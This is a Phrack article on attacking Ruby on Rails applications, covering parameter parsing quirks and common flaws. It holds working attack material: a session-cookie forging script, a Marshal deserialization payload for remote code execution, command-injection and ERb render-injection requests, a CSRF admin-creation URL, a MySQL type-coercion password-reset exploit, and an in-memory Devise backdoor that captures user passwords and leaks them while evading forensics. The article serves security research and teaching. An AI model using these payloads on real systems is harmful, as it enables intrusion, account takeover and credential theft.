Title : Attacking Ruby on Rails Applications

Author : joernchen

==Phrack Inc.== Volume 0x0f, Issue 0x45, Phile #0x0c of 0x10 |=-----------------------------------------------------------------------=| |=--------------=[ Attacking Ruby on Rails Applications ]=---------------=| |=-----------------------------------------------------------------------=| |=---------------------=[ joernchen of Phenoelit ]=----------------------=| |=---------------------=[ joernchen@phenoelit.de ]=----------------------=| |=-----------------------------------------------------------------------=| --[ Table of contents 0 - Intro 1 - A Brief Overview 1.1 - User input 1.1.1 - POST/PUT/GET application/x-www-form-urlencoded 1.1.2 - Multiparameter attributes 1.1.3 - POST/PUT text/xml 1.1.4 - POST/PUT application/json 1.1.5 - GET vs. POST/PUT 2 - Common pitfalls 2.1 - Sessions 2.2 - to_json / to_xml 2.3 - Code / Command Execution 2.3.1 - Classical OS Command Injection 2.3.2 - eval(user_input) and Friends 2.3.3 - Indirections 2.4 - Mass assignments 2.5 - Regular Expressions 2.6 - Renderers 2.7 - Routing 3 - My favourite technique - CVE-2013-3221 4 - Notes on Code Injection Payloads 5 - Greetz and <3 A - References --[ 0 - Intro This little article aims to give an introduction to the topic of attacking Ruby on Rails applications. It's neither complete nor dropping 0day. It's rather the authors attempt to accumulate the interesting attack paths and techniques in one write up. As yours truly spend most of his work on Ruby on Rails applications in the time when Rails version 3 was current, some of the described techniques are not applicable to Rails 4 any more. However there is still a broad attack surface of older applications as migrating Rails code up one or two version appears to be a real pain in the ass for lager projects (if you doubt this ask your local Rails startup peeps :) ). --[ 1 - A Brief Overview Basically Ruby on Rails [0] is a Model-View-Controller (MVC) based web application framework. It's overloaded with functionality, and this functionality is what at the end of the day introduces the fine bugs we all are looking for. MVC is a software design pattern, which just says roughly the following: The model is where the data lives, along with the business logic. So the model is an abstraction to the database. The view is what you see, like the HTML templates which get rendered. The controller itself is, what you interact with. It takes requests and decides upon them what to do with the data which were submitted. This architecture is reflected in Rails on the file system, a sample application's directory structure would look like this: . |-- app |here lives the applications main code | |-- assets | | |-- images | | |-- javascripts | | `-- stylesheets | |-- controllers |here live the controllers | |-- helpers | |-- mailers | |-- models |this is where the models live | `-- views |and finally here are the views | `-- layouts |-- config |yummy config files | |-- environments | |-- initializers | `-- locales |-- db |-- doc |-- lib |more code | |-- assets | `-- tasks |-- log |-- public |static content |-- script |-- test | /* */ | |-- fixtures | |-- functional | |-- integration | |-- performance | `-- unit |-- tmp | `-- cache | `-- assets `-- vendor |-- assets | |-- javascripts | `-- stylesheets `-- plugins |here might be bugs too The point of first attention here is the ./app/ directory, this is where controllers, models and views live. It has to be noted that the MVC design pattern, even tough it's implied by the filesystem layout of a fresh Rails application, is not enforced by Ruby on Rails in any way. For instance a developer might just put parts of the business logic into the view instead of into the model. --[ 1.1 - User input The following sub-sections will cover the various kinds of user input a Rails application will understand and parse. The most prominent input vector for a Rails application is usually the params hash, which is described in detail below. --[ 1.1.1 - POST/PUT/GET application/x-www-form-urlencoded The params hash (hash is Ruby slang for an associative array) holds the request parameters in Rails. So parameters that are POSTed like this: username=hacker&password=happy will yield a params hash like the following: params = {"username"=>"hacker","password"=>"happy"} Lots of magic is involved within Rails' parameter parsing. POST parameters encoded as application/x-www-form-urlencoded or regular GET parameters can encode arrays like this: user[]=Phrack&user[]=rulez The resulting params hash is in this case: params {"user" => ["Phrack","rulez"]} Encoding sub-hashes in the params hash is also possible: user[name]=hacker&user[password]=happy The above will result in params being the following: params = {"user"=>{"name"=>"hacker","password"=>"happy"}} Besides strings with the basic GET/POST parameters it is also possible to encode a Ruby nil value in this way: user[name] by leaving out the = and a value the resulting hash looks like: params = {"user"=>{"name"=>nil}} --[ 1.1.2 - Multiparameter attributes When a single parameter has to carry multiple values in one attribute those can be encoded in simple POST and GET requests as well. Those so called multiparameters look like the following: user[mulitparam(1)]=first_val&user[mulitparam(2)]=second_val&[...] &user[mulitparam(n)]=nth_val Also valid is a multiparameter assignment with a single parameter like: user[name(1)]=HappyHacker Internally the values (1)..(n) will be converted into an array and this array will be assigned to the attribute. This is rarely to be seen in real world code, however useful for instance when it comes to e.g. timestamps: post[date(1)]=1985&post[date(2)]=11&post[date(3)]=17 Where the above example would assign year, month and day of the post[date] parameter in a multiparameter attribute called date. --[ 1.1.3 - POST/PUT text/xml Besides the usual POST/PUT parameters Rails typically also understands XML input. This however was removed within the Rails 4 release [1]. With XML encoded parameters there are various typecasting possibilities. Here is an excerpt from the responsible parser (rails/activesupport/lib/active_support/xml_mini.rb): PARSING = { "symbol" => Proc.new { |symbol| symbol.to_sym }, "date" => Proc.new { |date| ::Date.parse(date) }, "datetime" => Proc.new { |time| ::Time.parse(time).utc rescue ::DateTime.parse(time).utc }, "integer" => Proc.new { |integer| integer.to_i }, "float" => Proc.new { |float| float.to_f }, "decimal" => Proc.new { |number| BigDecimal(number) }, "boolean" => Proc.new { |boolean| %w(1 true).include?(boolean.strip) }, "string" => Proc.new { |string| string.to_s }, "yaml" => Proc.new { |yaml| YAML::load(yaml) rescue yaml }, "base64Binary" => Proc.new { |bin| ActiveSupport::Base64.decode64(bin) }, "binary" => Proc.new { |bin, entity| _parse_binary(bin, entity) }, "file" => Proc.new { |file, entity| _parse_file(file, entity) } } PARSING.update( "double" => PARSING["float"], "dateTime" => PARSING["datetime"] ) So if a boolean value should be contained in a POSTed variable within the params hash, this XML POSTed with Content-Type: text/xml will achieve it: <user> <admin type="boolean">true</admin> </user> The params hash from the above POSTed XML would be: params = {"user"=>{"admin"=>true}} At this point it has to be noted that the conversions for the types "symbol" and "yaml" have been blacklisted since CVE-2013-0156. This CVE is actually the most impactful on RoR. Due to YAML being able to create arbitrary Ruby objects it was possible to gain code execution with just a single POST request, pretty similar to the sessions issue described in 2.1. Symbols have been removed from the conversion simply due to the fact, that they won't get garbage collected a runtime, therefore being useful for e.g. memory exhaustion attacks. There are two more supported types which are not listed above, they rather are defined in rails/activesupport/lib/active_support/core_ext/hash/conversions.rb. Those two types are "hash" and "array". A hash is pretty simple to put up in XML. It needs to be POSTed like this: <user> <name>hacker</name> </user> The above XML will result in this hash: params = {"user"=>{"name"=>"hacker"}} Arrays with typed XML are assembled together like the following: <a type="array"> <a>some value</a> <a>some other value</a> </a> which will yield: params = {"a"=>["some value","some other value"]} Furthermore nil can be encoded this way <a nil="true"> which results in this params hash: {"a"=>nil} --[ 1.1.4 - POST/PUT application/json JSON input POSTed with the Content-Type of application/json can't encode as many object types as XML, but the following types are defined per the JSON specification: * String * Object (which will be a hash in Ruby) * Number * Array * True * False * Null (which will be nil in Ruby) Before the Rails patches for the CVEs 2013-0333 and 2013-0268 it was possible to encode arbitrary Objects in JSON, the details on CVE-2013-0333 will be discussed in section 3.3. With a POST request containing the following JSON payload: {"a":["string",1,true,false,null,{"hash":"value"}]} a params hash of: params = {"a"=>["string", 1, true, false, nil, {"hash"=>"value"}]} will be generated. --[ 1.1.5 - GET vs. POST/PUT By default it's even possible to send application/json and text/xml typed parameters within a GET request, by simply issuing a GET request with an according Content-Type, a proper Content-Length as well as the actual request body. For instance: curl -X GET http://somerailsapp/ -H "Content-type: application/json" \ --data '{"a":"z"}' Additional magic is buried in the _method parameter when used in a POST request. For instance the following POST request will be interpreted as PUT: curl -X POST http://somerailsapp/?_method=PUT --data 'somedata' So setting _method in a POST request to a legal HTTP verb will let Rails interpret the POST as what _method is set to (GET,PUT, etc.). --[ 2 - Common pitfalls With the knowledge of various ways to encode our mali^W well crafted input for a Rails application, let's have a look at patterns of "what could possibly go wrong?". This section will elaborate some of the nasty side effects introduced by rather common coding practices in Ruby on Rails. Of course it will also be explained how to use those side effects in order to extend the functionality of an affected application. --[ 2.1 - Sessions By default Rails stores the sessions client-side within a cookie. The whole session hash gets serialized (also encrypted in Rails 4) and HMACed (in Rails 3 and 4) in order to be tamper-resistant. Since Rails 4.1 the format for serialization used is JSON encoding. Before that version it used to be Ruby's own serialization format called Marshal. Marshaled ruby objects look like this: irb(main):001:0> foo = ["Some funky string",{"a hash"=>1337}] => ["Some funky string", {"a hash"=>1337}] irb(main):002:0> Marshal.dump foo => "\x04\b[\aI\"\x16Some funky string\x06:\x06ET{\x06I\"\va hash\x06;\x00Ti\x029\x05" It's basically a TLV serialization format, which can encode almost arbitrary Ruby Objects. The secret key to the HMAC/encryption might be stored in various locations depending on the Rails version it might be found in the following files: * config/environment.rb * config/initializers/secret_token.rb * config/secrets.yml * /proc/self/environ (if it's just given via an ENV variable) In rare cases it might be found somewhere completely different. But the best place to look for Rails cookie secrets is Open Source code checked into public repositories. Once revealed to a curious hacker the cookie signing/encryption secret offers a broad amount of fun to have with it. First of all session tampering is possible, as we are able to sign/encrypt arbitrary session data. Typically (when no special authentication GEMs are used) the user_id of the currently logged in user is serialized into the session. So it's pretty much a piece of cake to serialize the user_id of any other user into the cookie using the following simple script: #!/usr/bin/env ruby # Sign a cookie in RoR style (Rails Version <=3.x only) require 'base64' require 'openssl' require 'optparse' banner = "Usage: #{$0} -k KEY [-c COOKIE]

" + "Cookie is a raw ruby expression like '{:user_id => 1}'" hashtype = 'SHA1' key = nil cookie = {"user_id"=>1} opts = OptionParser.new do |opts| opts.banner = banner opts.on("-k", "--key KEY") do |h| key = h end opts.on("-c", "--cookie COOKIE") do |w| cookie = w end end begin opts.parse!(ARGV) rescue Exception => e puts e, "", opts exit end if key.nil? puts banner exit end cook = Base64.strict_encode64(Marshal.dump(eval("#{cookie}"))).chomp digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(hashtype), key, cook) puts("#{cook}--#{digest}") The secret_token is not only usable for session tampering, it can even be used for remote command execution. The following Ruby method will generate a code-executing session cookie (this is Rails 3 specific payload, but the same principle works with Rails 4 with slight modifications): def build_cookie code = "eval('whatever ruby code')" marshal_payload = Rex::Text.encode_base64( "\x04\x08" + "o" + ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" + "\x07" + ":\x0E@instance" + "o" + ":\x08ERB" + "\x06" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0C@method" + ":\x0Bresult" ).chomp digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"), SECRET_TOKEN, marshal_payload) marshal_payload = Rex::Text.uri_encode(marshal_payload) "#{marshal_payload}--#{digest}" end For details on the Rails 4 version and more convenient use of the vector the exploits/multi/http/rails_secret_deserialization module in Metasploit is recommend reading/using. The above code serializes an object in Rubys' Marshal format and then HMACs the serialized data. The object that is serialized is an instance of ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy which is defined as the following: class DeprecatedInstanceVariableProxy < DeprecationProxy def initialize(instance, method, var = "@#{method}", deprecator = ActiveSupport::Deprecation.instance) @instance = instance @method = method @var = var @deprecator = deprecator end private def target @instance.__send__(@method) end def warn(callstack, called, args) @deprecator.warn( "#{@var} is deprecated! Call #{@method}.#{called} instead of " + "#{@var}.#{called}. Args: #{args.inspect}", callstack) end end DeprecatedInstanceVariableProxy again inherits from DeprecationProxy, which defines the following interesting method: def method_missing(called, *args, &block) warn caller, called, args target.__send__(called, *args, &block) end as well as undefines some methods: instance_methods.each { |m| undef_method m unless m =~ /^__|^object_id$/ } Inside this DeprecatedInstanceVariableProxy an ERB object is placed asA "instance", and "method" is set to "result". ERB stands for embedded Ruby and is in RoR to have HTML templates including Ruby code, so basically ERB is used for the views in a Rails application. The "src" variable for this ERB object is an arbitrary string of Ruby code. After deserialization and construction of the two nested objects the following will happen: The above mentioned interesting method called method_missing is an expression of Ruby magic. When an object defines a method_missing this method will be called whenever a method on the object is called which does not exist (is missing). As soon as any method on the deserialized object is called, this will be passed to "method_missing" as (almost) all instance methods have been undefined. "method_missing" will now first call "warn" and afterwards call target which will send the method "result" to the ERB object. "result" will interpret and the code attached in the ERB object as "src". The following irb snippet demonstrates this behavior: 1.9.3p194 :001 > require 'rails/all' => true 1.9.3p194 :002 > Marshal.load( "\u0004\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+ "\a:\u000E@instanceo:\bERB\u0006:\t@srcI\"\u0018eval('puts \"ohai\"')"+ "\u0006:\u0006ET:\f@method:\vresult") ohai => nil Credits for the above technique go to Charlie Somerville. Since Rails 4.1 this vector is not usable anymore, due to the fact that JSON encoding is used to serialize the session. Actually thats not entirely true, as there is of course backward compatibility for legacy session cookies. Those legacy cookies are taken into account if in a Rails App >= Version 4.1 a secret_token is defined together with the new secret_key_base. Or if there is only a secret_token but no secret_key_base, which might be the case if you upgrade your App from Rails 3.something to 4.1 or later. You can tell that you're dealing with a legacy cookie if the cookie value starts with "BAh" which Base64 decodes to the Marshal header. If the session's secret is not known, there is still some room to fail, so for example let's say an appliance by BigVendor has a RoR Webinterface, and additionally stores the currently logged in users' ID in the session. Now the BigVendor has a little problem if the session secret is the same on all appliances. If user admin A of appliance A' has a session cookie for it's user_id 1 on A', it's a legit session cookie for appliance B' where admin B has user_id 1 as well (the ID is typically incremental starting from 1 and admin is usually created first). To paraphrase this: "What has been HMACed cannot be un-HMACED". --[ 2.2 - to_json / to_xml Within Rails the scaffolding process generates automatic XML and JSON renderers. Those include by default all attributes of the model. A neat showcase for this behavior is documented in [3] where a simple authenticated request of http://demo.fatfreecrm.com/users/1.json yielded the following json output: { "user": { "admin": true, "aim": "", "alt_email": "", "company": "example", "created_at": "2012-02-12T02:00:00+02:00", "current_login_at": "2013-08-26T22:12:05+03:00", "current_login_ip": "61.143.60.146", "deleted_at": null, "email": "aaron@example.com", "first_name": "Aaron", "google": "", "id": 1, "last_login_at": "2013-08-24T22:20:06+03:00", "last_login_ip": "122.173.185.99", "last_name": "Assembler", "last_request_at": "2013-08-26T22:13:35+03:00", "login_count": 481, "mobile": "(800)555-1211", "password_hash": "[...]", "password_salt": "[...]", "perishable_token": "NE0n6wUCumVNdQ24ahRu", "persistence_token": "...", "phone": "(800)555-1210", "single_access_token": "TarXlrOPfaokNOzls2U8", "skype": "ranzitreddy", "suspended_at": null, "title": "VP of Sales", "updated_at": "2013-08-26T22:13:35+03:00", "username": "aaron", "yahoo": "" } } The format parameter could, depending on the actual app's routes be either just a appended .json/.xml or a query parameter "format=json"/"format=xml" within the URL. In some rarely but seen in the wild cases there are even "format=js" renderes which yield vulnerabilities. Imagine a user's inbox at: http://some.host/inbox/messages When here the JavaScript renderer emits e.g. JQuery framgents like: $("#messages").hmtl("here goes the user's inbox") We just might include <script src="http://some.host/inbox/messages?format=js"></script> on a third party website and leak the users' inbox. This is pretty much the same concept like a JSONP leak. --[ 2.3 - Code / Command Execution Now off to the real fun: different ways to execute your code on other people's web servers. --[ 2.3.1 - Classical OS Command Injection The classical command injection patterns of course also apply to Ruby on Rails applications. Things to watch out for include: * `command` * %x/command/ * IO.popen(command) * Kernel.exec * Kernel.system * Kernel.open("| command") This list is not complete in any way, as there are many other Rubygems implementing wrappers around those functions (also maybe I've just missed for instance open3 in this list). As the average Phrack reader should be pretty familiar with the concept of OS command injection flaws we do not bother to further elaborate on this type of issue ;P. A little sidenote on Kernel.open(): when the first character in the argument to Kernel.open is a pipe, the method basically behaves like popen. And the rest of the string after the pipe is taken as a command line. --[ 2.3.2 - eval(user_input) and Friends Things get a bit more interesting when it comes to RoR constructs which end up in eval()ing user input. Here, due to Rubys' endless possibilities of dynamic programming and monkey patching, things get a bit more interesting. Hints on how to utilize in-framework code execution are given in section 4. With the following methods we can evalute nifty payloads within the apps' runtime/environment: * eval within the current context * instance_eval within the context of the current instance of a class * class_eval within the context of a class itself In occurrences of such in-framework evaluation of attacker-given inputs, we can pretty much redefine and access anything within the application. --[ 2.3.3 Indirections Another fun thing when it comes to monkey patching and dynamic (hooray!) programming are indirections introduced by calling one of the following methods on user input: * send * __send__ * public_send * try What send et.al. do is calling a method denoted by the first parameter, which might be a string or a symbol, and passing the further arguments to the called method. So imagine (this is actually not too imaginary [4]) the following construct: send(params[:a],params[:b]) Easy enough we can turn this into in-Framework RCE by supplying: a=eval&b=whatever%20ruby%20code%20we%20like The main differences between the above listed methods are: * send and __send__: none * send and try: try is defined within Rails and just silently drops all exceptions which might occur * public_send will only call public methods on an object The limitation of public_send however can be bypassed as send itself is public: irb(main):002:0> "".public_methods.grep /send/ => [:send, :public_send, :__send__] The above construction of having at least two, and most importantly the first argument to __send__ under control however is rather rare. Mostly you will see the code like: Thing.send(:hard_coded_method_name, params[someparam]) As the method to be called is hard coded we cannot leverage arbitrary code execution unfortunately. --[ 2.4 - Mass assignments Mass assignments were a pretty popular exploit target in Rails 3. The underlying concept is, that the application assigns arbitrary values of the model when being saved: app/controller/users_controller.rb: def update @user = User.find(params[:id]) respond_to do |format| if @user.update_attributes(params[:user]) If the User model has e.g. an "admin" attribute any user might promote themselves to admin by just posting that attribute towards to the application. A common malpractice which tries to prevent Mass Assignments is shown in the code sample below: app/controller/users_controller.rb: def update @user = User.find(params[:id]) params[:user].delete(:admin) # make sure to protect admin flag respond_to do |format| if @user.update_attributes(params[:user]) [...] Within this controller and the usage of Multiparameter Attributes as introduced in section 1.4.2 we can bypass the params[:user].delete(:admin) sanitization as with the following payload: user[admin(1)]=true As the multiparameter attribute gets parsed in user.update_attributes, the protection params[:user].delete(:admin) will not catch the user[admin(1)] attribute, allowing us to elevate our privileges. This is simply due to the fact that the parameter within the controller will be "admin(1)" as in contrast to "admin", the actual assignment of admin(1) to the admin flag happens in the update_attributes call. The proper way to prevent attributes from being automatically assigned within Rails 3.x would be the usage of attr_accessible to define which attributes are whitelisted for mass assignment. --[ 2.5 - Regular Expressions Ruby has a special handling of regular expressions, the regexps are matching by default in multi-line mode. This is not the case for instance in Perl or other programming languages. To demonstrate this behavior compare the two command lines below: $ perl -e '$a="foo

bar"; $a =~ /^foo$/ ? print "match" : \ print "no match"' no match $ ruby -e 'a="foo

bar"; if a =~ /^foo$/; puts "match"; \ else puts "no match"; end' match The string "foo

bar" does not match the regular expression /^foo$/ in the Perl code snippet, it is matching in the Ruby code snippet. The main problem with this regular expression handling is that quite a lot of developers are not aware of this subtle difference. This results in improper checks and validations. As an example the controller below comes close to what can be observed in real world code (the regex is somewhat simplified here): class PingController < ApplicationController def ping if params[:ip] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/ render :text => `ping -c 4 #{params[:ip]}` else render :text => "Invalid IP" end end end The developer's expectation is to match only numbers and dots within the above IP address validation. But due to the default multi line mode of Ruby's regular expression parser the above check can be circumvented by a string like "1.2.3.4.

something". The $ in the above regex would stop at

therefore the above code is command injectable with a simple request like this: $ curl localhost:3000/ping/ping -H "Content-Type: application/json" \ --data '{"ip" : "127.0.0.999

id"}' Instead of using ^ and $ \A and \z should be used to match the beginning and end of the string, rather than the beginning or end of the line. Another common usecase of this RegEx behavior is the verification of user given links. So for instance the RegEx /^https?:\/\// is bypassable by supplying a link like: "javascript:alert('lol')/*

http://*/" (note the newline) When this input is rendered into a href attribute of an anchor tag, we've gotten a straight froward Cross-Site Scripting. --[ 2.6 Renderers The render statement in RoR is used to render different templates or just plain text towards the users Browser like: render text: "Ohai World!" If we are in the lucky postition to see something like this: render params[:t] We are able to inject ERb content by supplying a parameter t of: t[inline]=<%=`id`%> curl 'localhost:3000/?&t\[inline\]=%3c%25=%60id%60%25%3e' This works due to the fact that the render statement takes a hash as argument which will be in the above case: inline: "<%=`id`%>" Where the inline renderer expects an ERb string. Et voila here we go with user supplied code to be executed. --[ 2.7 Routing The file config/routes.rb describes which Controllers are reachable under which path and HTTP verb, so for instance: post "user/add" => "users#add_user" would expose the method add_user from the UsersController at the path '/users/add' via a Post request. A common mistake however is a default catch-all route like the following: match ':controller(/:action(/:id))(.:format)', via: [:get, :post] This would expose every public method from every Controller being accessible both via GET and POST requests. The main problem with such a catch-all route is, that it completely subverts the RoR CSRF protection, as GET requests are assumed to be not state changing, and therefore are white-listed within the CSRF protection. So in the above example with the two given routes an attacker would just CSRF something like: http://vict.im/user/add?user[name]=haxx0r&user[password]=h4x0rp455& user[admin]=1 In order to subvert the CSRF protection which was intended by the 'post' statement in the routes. --[ 3 - My favourite technique - CVE-2013-3221 This section is dedicated to my favourite RoR attack technique, which was initially NOT addressed by issuing CVE-2013-3221. The issue described in CVE-2013-3221 is a neat way to abuse MySQL's automagic type conversion in order to e.g. reset arbitrary passwords within some Ruby on Rails applications (including but not limited to the BlackHat CFP Review System [5]). Let's first have a look at MySQL and how it compares numbers to strings: mysql> SELECT 123 FROM dual WHERE 1=1; +-----+ | 123 | +-----+ | 123 | +-----+ 1 row in set (0.00 sec) mysql> SELECT 123 FROM dual WHERE 1="1"; +-----+ | 123 | +-----+ | 123 | +-----+ 1 row in set (0.00 sec) mysql> SELECT 123 FROM dual WHERE 1="1somestring"; +-----+ | 123 | +-----+ | 123 | +-----+ 1 row in set, 1 warning (0.00 sec) mysql> SELECT 123 FROM dual WHERE 1="somestring"; Empty set, 1 warning (0.00 sec) mysql> SELECT 123 FROM dual WHERE 0="somestring"; +-----+ | 123 | +-----+ | 123 | +-----+ 1 row in set, 1 warning (0.00 sec) A pretty common technique for password resets in web applications is to send out a token via email to the user. This token lets the user reset the password right away. In Ruby on Rails such a reset process would roughly look like this: # PasswordController def reset user = User.find_by_token(params[:user][:token]) if user #reset password here end end Such a token like the one pulled out of params in the code above typically is a random string, for now let's just assume this string is "IAmARandomToken". Given the knowledge about the MySQL typecasting plus the facts about JSON/XML input described in section 1.1.3 & 1.1.4 we can conduct an actual attack on this pattern. MySQL would match the string "IAmARandomToken" with the number 0 so a possible exploit would look like: curl http://phrack.org/password/reset \ -H 'Content-Type: application/json' \ --data '{"user":{"token":0,"pass":"omghaxx","pass_confirm":"omghaxx"}}' This attack vector got addressed with a security announcement [6] which said it will be fixed somewhen later. A little anecdote on this issue: A couple of days after the advisory the issue was "fixed" in Rails 3.2.12 as by the following commit [7], no further advisory was released for this issue. The fix in 3.2.12 was first of all incomplete due to the fact that it was bypassable by POSTing an array of numbers instead of a single number. Secondly Rails went back to the original behaviour with the release of 3.2.13. Indeed the vector is completely fixed as of Rails 4.2 almost two years after the original advisory. --[ 4 - Notes on Code Injection Payloads The wonderful world of Ruby on Rails gives us, in case of in-framework code injection, a lot of toys to play with. As the whole framework is available to the attacker its' whole featureset might be utilized. This starts with very simple but convenient things: In 2.1 code execution via unmarshalling of the session cookie was elaborated. A very handy data exfiltration technique for small (<4K) amounts of data is using the session cookie itself to carry the exfiltrated data out [/* Eat this, WAF */]. The to-be-executed payload to use this technique would roughly be the following: lootit=<<WOOT a={} # This will end up as our session object a['loot'] = User.find_by_email("admin@app.com").password # Guess what :P a # return a as session hash WOOT The above _string_ then is used in a cookie using the RCE technique from 2.1. If done all right the response to that cookie will contain another new cookie which contains a 'loot' key which has the value of the requested data. Anything goes with Ruby: Imagine an app where the passwords are properly salted and hashed and streched and whatnot. In order to not waste any GPU time for breaking the precious hashes we could instead inject some code which re-writes the apps login controller in a way that it will first log out all users, and then log all the sent passwords in memory until they are fetched by defined request. A PoC for this technique against the devise authentication framework is shown in [8]. The main component of it is the actual to-be-evaluated payload: Devise::SessionsController.class_eval <<DEVISE @@passwordsgohere = [] @@target_model = nil @@triggerword = "22bce2630cb45cbff19490371d19a654b01ee537" @@secret = "12IO0nCNPFhWz7a56rmhkiIQ8BOgbUw7yIYl++jYNkxAseBT3Q02N+CwShuqDBqY" def logallthepasswords @@target_model= @@target_model || ActiveRecord::Base.subclasses.collect {|c| c if c.methods.include? :devise }.first.model_name.param_key if params[@@target_model] @@passwordsgohere<< params[@@target_model] end end def leakallthepasswords keygen = ActiveSupport::KeyGenerator.new(@@secret,{:iterations => 1337}) enckey = keygen.generate_key('encrypted hacker') sigkey = keygen.generate_key('signed encrypted hacker') crypter = ActiveSupport::MessageEncryptor.new(enckey, sigkey,{:serializer => ActiveSupport::MessageEncryptor::NullSerializer }) if Digest::SHA1.hexdigest(session["session_id"].to_s) == @@triggerword render :text => crypter.encrypt_and_sign(JSON.dump(@@passwordsgohere)) @@passwordsgohere = [] end end before_filter :logallthepasswords before_filter :leakallthepasswords DEVISE The above code, when RCEd into a Ruby on Rails application using devise will introduce two filters in the apps login Controller, one filter called logallthepasswords which keeps every password and username in memory upon login. Secondly the leakallthepasswords filter will dump those passwords upon seeing a specific session id and flush them from memory. Key takeaway here (which does not only apply to RoR applications) is actually the fact that we can model our own little application within some target app pretty much freely when using eval() or session cookie based RCE payloads. Another fun fact about this is the circumstance that the payload will reside in memory. Once the app is shut down your payload is gone. And by giving up the persistence we will pretty likely win against the forensics guy. --[ 5 - Greetz and <3 In no particular order: astera, greg (thx for kicking my ass), FX, nowin, fabs, opti, tina, matteng, RL, HDM, charliesome, both Bens (M. and T.), larry0 (Gemkiller). The award for endless patience with this little writeup goes to the Phrack Staff obviously ;). --[ A - References [0] http://rubyonrails.org [1] https://github.com/rails/rails/commit/ c9909db9f2f81575ef2ea2ed3b4e8743c8d6f1b9 [3] http://www.phenoelit.org/stuff/ffcrm.txt [4] https://github.com/rapid7/metasploit-framework/blob/master/modules/ exploits/multi/http/spree_searchlogic_exec.rb [5] https://www.blackhat.com/latestintel/04302014-poc-in-the-cfp.html [6] https://groups.google.com/group/rubyonrails-security/browse_thread/ thread/64e747e461f98c25 [7] https://github.com/rails/rails/commit/ 921a296a3390192a71abeec6d9a035cc6d1865c8 [8] https://github.com/joernchen/DeviseDoor